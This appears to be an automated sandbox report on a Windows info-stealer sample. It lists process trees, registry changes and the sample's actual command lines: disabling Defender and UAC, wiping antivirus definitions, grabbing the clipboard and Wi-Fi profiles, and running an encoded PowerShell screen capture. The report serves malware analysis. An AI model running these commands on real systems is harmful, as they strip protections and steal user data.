Enumerates processes with tasklist 1 TTPs 3 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exetasklist.exe

pid process

456 tasklist.exe
2496 tasklist.exe
3416 tasklist.exe
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.

System Information Discovery
T1082

Processes:

systeminfo.exe

pid process

4068 systeminfo.exe

pid	process
1208	WMIC.exe

pid	process
456	tasklist.exe
2496	tasklist.exe
3416	tasklist.exe

pid	process
4068	systeminfo.exe

Modifies registry class 14 IoCs

Processes:

smss.exesmss.exesmss.exesmss.exeantiriser.batMonitorcommon.exesmss.exesmss.exesmss.exesmss.exesmss.exesmss.exesmss.exesmss.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	smss.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	smss.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	smss.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	smss.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	antiriser.bat
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	Monitorcommon.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	smss.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	smss.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	smss.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	smss.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	smss.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	smss.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	smss.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	smss.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

6064 reg.exe

pid	process
6064	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeMonitorcommon.exepowershell.exepowershell.exeMonitorcommon.exesmss.exe

pid	process
5096	powershell.exe
5096	powershell.exe
3092	powershell.exe
3092	powershell.exe
3092	powershell.exe
3092	powershell.exe
3304	powershell.exe
3304	powershell.exe
5096	powershell.exe
5096	powershell.exe
4956	powershell.exe
4956	powershell.exe
3304	powershell.exe
4956	powershell.exe
3668	powershell.exe
3668	powershell.exe
3668	powershell.exe
4860	powershell.exe
4860	powershell.exe
4860	powershell.exe
5532	Monitorcommon.exe
5532	Monitorcommon.exe
5532	Monitorcommon.exe
5532	Monitorcommon.exe
5532	Monitorcommon.exe
5532	Monitorcommon.exe
5532	Monitorcommon.exe
5532	Monitorcommon.exe
1892	powershell.exe
1892	powershell.exe
1892	powershell.exe
452	powershell.exe
452	powershell.exe
452	powershell.exe
540	Monitorcommon.exe
540	Monitorcommon.exe
540	Monitorcommon.exe
540	Monitorcommon.exe
540	Monitorcommon.exe
540	Monitorcommon.exe
540	Monitorcommon.exe
540	Monitorcommon.exe
5572	smss.exe
5572	smss.exe
5572	smss.exe
5572	smss.exe
5572	smss.exe
5572	smss.exe
5572	smss.exe
5572	smss.exe
5572	smss.exe
5572	smss.exe
5572	smss.exe
5572	smss.exe
5572	smss.exe
5572	smss.exe
5572	smss.exe
5572	smss.exe
5572	smss.exe
5572	smss.exe
5572	smss.exe
5572	smss.exe
5572	smss.exe
5572	smss.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exetasklist.exetasklist.exeWMIC.exetasklist.exepowershell.exepowershell.exepowershell.exeMonitorcommon.exepowershell.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	3092	powershell.exe
Token: SeDebugPrivilege	5096	powershell.exe
Token: SeDebugPrivilege	456	tasklist.exe
Token: SeDebugPrivilege	3416	tasklist.exe
Token: SeIncreaseQuotaPrivilege	1244	WMIC.exe
Token: SeSecurityPrivilege	1244	WMIC.exe
Token: SeTakeOwnershipPrivilege	1244	WMIC.exe
Token: SeLoadDriverPrivilege	1244	WMIC.exe
Token: SeSystemProfilePrivilege	1244	WMIC.exe
Token: SeSystemtimePrivilege	1244	WMIC.exe
Token: SeProfSingleProcessPrivilege	1244	WMIC.exe
Token: SeIncBasePriorityPrivilege	1244	WMIC.exe
Token: SeCreatePagefilePrivilege	1244	WMIC.exe
Token: SeBackupPrivilege	1244	WMIC.exe
Token: SeRestorePrivilege	1244	WMIC.exe
Token: SeShutdownPrivilege	1244	WMIC.exe
Token: SeDebugPrivilege	1244	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1244	WMIC.exe
Token: SeRemoteShutdownPrivilege	1244	WMIC.exe
Token: SeUndockPrivilege	1244	WMIC.exe
Token: SeManageVolumePrivilege	1244	WMIC.exe
Token: 33	1244	WMIC.exe
Token: 34	1244	WMIC.exe
Token: 35	1244	WMIC.exe
Token: 36	1244	WMIC.exe
Token: SeDebugPrivilege	2496	tasklist.exe
Token: SeDebugPrivilege	3304	powershell.exe
Token: SeDebugPrivilege	4956	powershell.exe
Token: SeIncreaseQuotaPrivilege	1244	WMIC.exe
Token: SeSecurityPrivilege	1244	WMIC.exe
Token: SeTakeOwnershipPrivilege	1244	WMIC.exe
Token: SeLoadDriverPrivilege	1244	WMIC.exe
Token: SeSystemProfilePrivilege	1244	WMIC.exe
Token: SeSystemtimePrivilege	1244	WMIC.exe
Token: SeProfSingleProcessPrivilege	1244	WMIC.exe
Token: SeIncBasePriorityPrivilege	1244	WMIC.exe
Token: SeCreatePagefilePrivilege	1244	WMIC.exe
Token: SeBackupPrivilege	1244	WMIC.exe
Token: SeRestorePrivilege	1244	WMIC.exe
Token: SeShutdownPrivilege	1244	WMIC.exe
Token: SeDebugPrivilege	1244	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1244	WMIC.exe
Token: SeRemoteShutdownPrivilege	1244	WMIC.exe
Token: SeUndockPrivilege	1244	WMIC.exe
Token: SeManageVolumePrivilege	1244	WMIC.exe
Token: 33	1244	WMIC.exe
Token: 34	1244	WMIC.exe
Token: 35	1244	WMIC.exe
Token: 36	1244	WMIC.exe
Token: SeDebugPrivilege	3668	powershell.exe
Token: SeDebugPrivilege	5532	Monitorcommon.exe
Token: SeDebugPrivilege	4860	powershell.exe
Token: SeIncreaseQuotaPrivilege	6084	WMIC.exe
Token: SeSecurityPrivilege	6084	WMIC.exe
Token: SeTakeOwnershipPrivilege	6084	WMIC.exe
Token: SeLoadDriverPrivilege	6084	WMIC.exe
Token: SeSystemProfilePrivilege	6084	WMIC.exe
Token: SeSystemtimePrivilege	6084	WMIC.exe
Token: SeProfSingleProcessPrivilege	6084	WMIC.exe
Token: SeIncBasePriorityPrivilege	6084	WMIC.exe
Token: SeCreatePagefilePrivilege	6084	WMIC.exe
Token: SeBackupPrivilege	6084	WMIC.exe
Token: SeRestorePrivilege	6084	WMIC.exe
Token: SeShutdownPrivilege	6084	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

338A02FF68C87C2E7D097B380656D773.exeBuilt.exeBuilt.execmd.execmd.execmd.execmd.exediscord pro+.execmd.execmd.execmd.exe

description	pid	process	target process
PID 2868 wrote to memory of 980	2868	338A02FF68C87C2E7D097B380656D773.exe	Built.exe
PID 2868 wrote to memory of 980	2868	338A02FF68C87C2E7D097B380656D773.exe	Built.exe
PID 2868 wrote to memory of 980	2868	338A02FF68C87C2E7D097B380656D773.exe	Built.exe
PID 2868 wrote to memory of 2920	2868	338A02FF68C87C2E7D097B380656D773.exe	BackgroundTransferHost.exe
PID 2868 wrote to memory of 2920	2868	338A02FF68C87C2E7D097B380656D773.exe	BackgroundTransferHost.exe
PID 980 wrote to memory of 4576	980	Built.exe	Built.exe
PID 980 wrote to memory of 4576	980	Built.exe	Built.exe
PID 980 wrote to memory of 4576	980	Built.exe	Built.exe
PID 4576 wrote to memory of 4720	4576	Built.exe	cmd.exe
PID 4576 wrote to memory of 4720	4576	Built.exe	cmd.exe
PID 4576 wrote to memory of 4720	4576	Built.exe	cmd.exe
PID 4576 wrote to memory of 4900	4576	Built.exe	cmd.exe
PID 4576 wrote to memory of 4900	4576	Built.exe	cmd.exe
PID 4576 wrote to memory of 4900	4576	Built.exe	cmd.exe
PID 4900 wrote to memory of 5096	4900	cmd.exe	powershell.exe
PID 4900 wrote to memory of 5096	4900	cmd.exe	powershell.exe
PID 4900 wrote to memory of 5096	4900	cmd.exe	powershell.exe
PID 4720 wrote to memory of 3092	4720	cmd.exe	powershell.exe
PID 4720 wrote to memory of 3092	4720	cmd.exe	powershell.exe
PID 4720 wrote to memory of 3092	4720	cmd.exe	powershell.exe
PID 4576 wrote to memory of 3584	4576	Built.exe	cmd.exe
PID 4576 wrote to memory of 3584	4576	Built.exe	cmd.exe
PID 4576 wrote to memory of 3584	4576	Built.exe	cmd.exe
PID 4576 wrote to memory of 3984	4576	Built.exe	cmd.exe
PID 4576 wrote to memory of 3984	4576	Built.exe	cmd.exe
PID 4576 wrote to memory of 3984	4576	Built.exe	cmd.exe
PID 4576 wrote to memory of 4412	4576	Built.exe	cmd.exe
PID 4576 wrote to memory of 4412	4576	Built.exe	cmd.exe
PID 4576 wrote to memory of 4412	4576	Built.exe	cmd.exe
PID 3984 wrote to memory of 456	3984	cmd.exe	tasklist.exe
PID 3984 wrote to memory of 456	3984	cmd.exe	tasklist.exe
PID 3984 wrote to memory of 456	3984	cmd.exe	tasklist.exe
PID 3584 wrote to memory of 3416	3584	cmd.exe	cmd.exe
PID 3584 wrote to memory of 3416	3584	cmd.exe	cmd.exe
PID 3584 wrote to memory of 3416	3584	cmd.exe	cmd.exe
PID 4576 wrote to memory of 628	4576	Built.exe	cmd.exe
PID 4576 wrote to memory of 628	4576	Built.exe	cmd.exe
PID 4576 wrote to memory of 628	4576	Built.exe	cmd.exe
PID 4576 wrote to memory of 3784	4576	Built.exe	cmd.exe
PID 4576 wrote to memory of 3784	4576	Built.exe	cmd.exe
PID 4576 wrote to memory of 3784	4576	Built.exe	cmd.exe
PID 4576 wrote to memory of 880	4576	Built.exe	cmd.exe
PID 4576 wrote to memory of 880	4576	Built.exe	cmd.exe
PID 4576 wrote to memory of 880	4576	Built.exe	cmd.exe
PID 4576 wrote to memory of 548	4576	Built.exe	cmd.exe
PID 4576 wrote to memory of 548	4576	Built.exe	cmd.exe
PID 4576 wrote to memory of 548	4576	Built.exe	cmd.exe
PID 4576 wrote to memory of 3120	4576	Built.exe	cmd.exe
PID 4576 wrote to memory of 3120	4576	Built.exe	cmd.exe
PID 4576 wrote to memory of 3120	4576	Built.exe	cmd.exe
PID 2920 wrote to memory of 2940	2920	discord pro+.exe	antiriser.bat
PID 2920 wrote to memory of 2940	2920	discord pro+.exe	antiriser.bat
PID 2920 wrote to memory of 2940	2920	discord pro+.exe	antiriser.bat
PID 4576 wrote to memory of 1548	4576	Built.exe	cmd.exe
PID 4576 wrote to memory of 1548	4576	Built.exe	cmd.exe
PID 4576 wrote to memory of 1548	4576	Built.exe	cmd.exe
PID 4412 wrote to memory of 1244	4412	cmd.exe	WMIC.exe
PID 4412 wrote to memory of 1244	4412	cmd.exe	WMIC.exe
PID 4412 wrote to memory of 1244	4412	cmd.exe	WMIC.exe
PID 628 wrote to memory of 3304	628	cmd.exe	powershell.exe
PID 628 wrote to memory of 3304	628	cmd.exe	powershell.exe
PID 628 wrote to memory of 3304	628	cmd.exe	powershell.exe
PID 3784 wrote to memory of 2496	3784	cmd.exe	tasklist.exe
PID 3784 wrote to memory of 2496	3784	cmd.exe	tasklist.exe

System policy modification 1 TTPs 45 IoCs

evasion

Modify Registry

T1112

Processes:

Monitorcommon.exesmss.exesmss.exesmss.exesmss.exesmss.exesmss.exesmss.exesmss.exesmss.exeMonitorcommon.exesmss.exesmss.exesmss.exesmss.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Monitorcommon.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Monitorcommon.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	Monitorcommon.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	Monitorcommon.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	Monitorcommon.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	Monitorcommon.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	smss.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\338A02FF68C87C2E7D097B380656D773.exe
"C:\Users\Admin\AppData\Local\Temp\338A02FF68C87C2E7D097B380656D773.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2868

C:\Users\Admin\AppData\Local\Temp\Built.exe
"C:\Users\Admin\AppData\Local\Temp\Built.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:980

C:\Users\Admin\AppData\Local\Temp\Built.exe
"C:\Users\Admin\AppData\Local\Temp\Built.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4576

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"
4⤵
- Suspicious use of WriteProcessMemory
PID:4720

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'
5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3092

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
4⤵
- Suspicious use of WriteProcessMemory
PID:4900

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5096

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
4⤵
- Suspicious use of WriteProcessMemory
PID:3584

C:\Windows\SysWOW64\tasklist.exe
tasklist /FO LIST
5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3416

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
4⤵
- Suspicious use of WriteProcessMemory
PID:3984

C:\Windows\SysWOW64\tasklist.exe
tasklist /FO LIST
5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:456

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
4⤵
- Suspicious use of WriteProcessMemory
PID:4412

C:\Windows\SysWOW64\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1244

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
4⤵
- Suspicious use of WriteProcessMemory
PID:628

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3304

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
4⤵
- Suspicious use of WriteProcessMemory
PID:3784

C:\Windows\SysWOW64\tasklist.exe
tasklist /FO LIST
5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2496

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
4⤵
PID:880

C:\Windows\SysWOW64\tree.com
tree /A /F
5⤵
PID:3032

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
4⤵
PID:548

C:\Windows\SysWOW64\netsh.exe
netsh wlan show profile
5⤵
PID:3268

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
4⤵
PID:3120

C:\Windows\SysWOW64\systeminfo.exe
systeminfo
5⤵
- Gathers system information
PID:4068

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9